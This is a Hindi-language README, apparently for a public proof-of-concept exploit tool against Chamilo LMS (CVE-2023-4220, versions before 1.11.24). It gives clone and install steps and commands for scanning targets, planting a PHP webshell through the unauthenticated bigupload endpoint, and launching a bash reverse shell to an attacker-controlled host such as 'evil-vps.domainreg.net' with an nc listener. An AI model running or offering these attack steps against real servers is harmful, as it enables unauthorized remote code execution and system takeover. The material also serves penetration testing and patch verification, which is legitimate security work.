
यह Python में लिखी गई एक स्क्रिप्ट है जो CVE-2023-4220 में वर्णित Chamilo के LMS सॉफ्टवेयर सुरक्षा दोष के शोषण की अनुमति देती है
यह स्क्रिप्ट CVE-2023-4220 में वर्णित Chamilo's LMS सॉफ़्टवेयर सुरक्षा दोष का शोषण करने की अनुमति देता है। सिस्टम 1.11.24 से पहले के संस्करणों में कमजोर है।
अपनी मशीन पर रिपॉजिटरी क्लोन करें और pip का उपयोग करके निर्भरताएँ स्थापित करें (इन इंस्टॉलेशन को वैश्विक इंस्टॉलेशन से अलग करने के लिए virtualenv का उपयोग करके एक वातावरण बनाने की अनुशंसा की जाती है)
git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
cd chamilo-lms-unauthenticated-big-upload-rce-poc
pip install -r requirements.txt
स्क्रिप्ट को Chamilo के रूट पथ (जैसे http://example.com/chamilo, http://example.com या http://chamilo.example.com) के साथ लक्ष्य URL और एक क्रिया करने की आवश्यकता है (उपलब्ध तीन क्रियाएँ हैं: scan, webshell और revshell)।
यह क्रिया /main/inc/lib/javascript/bigupload/files/ एंडपॉइंट तक पहुँचने का प्रयास करके जाँच करेगी कि लक्ष्य कमजोर है या नहीं।
python3 main.py -u http://example.com/chamilo -a scan

यह क्रिया कमजोर एंडपॉइंट में एक PHP वेबशेल फ़ाइल बनाएगी।
python3 main.py -u http://example.com/chamilo -a webshell

यह क्रिया एक bash रिवर्स शेल फ़ाइल बनाएगी और निष्पादित करेगी। ऐसा करने के लिए, पहले webshell बनाया जाएगा, उसी विधि का उपयोग करके जो पिछली क्रिया में उपयोग की गई थी। उसके बाद, bash फ़ाइल बनाने और निष्पादित करने के लिए कुछ कमांड निष्पादित किए जाएंगे। सुनिश्चित करें कि आप nc या किसी अन्य उपयोगिता के साथ परिभाषित पोर्ट पर सुन रहे हैं ताकि आपको वास्तव में रिवर्स कनेक्शन मिल सके। साथ ही, होस्ट एक मान्य आंतरिक/सार्वजनिक IPv4 (जैसे 172.17.1.4 या 186.227.4.31) या वह डोमेन हो सकता है जिसे आपने पंजीकृत किया है (जैसे evil-vps.domainreg.net)
python3 main.py -u http://example.com/chamilo -a revshell

नोट: जल्द ही मैं Windows होस्ट के लिए एक Windows पेलोड विकल्प जोड़ूंगा
(CVE-2023-4220) Chamilo LMS अनधिकृत बड़ी अपलोड फ़ाइल दूरस्थ कोड निष्पादन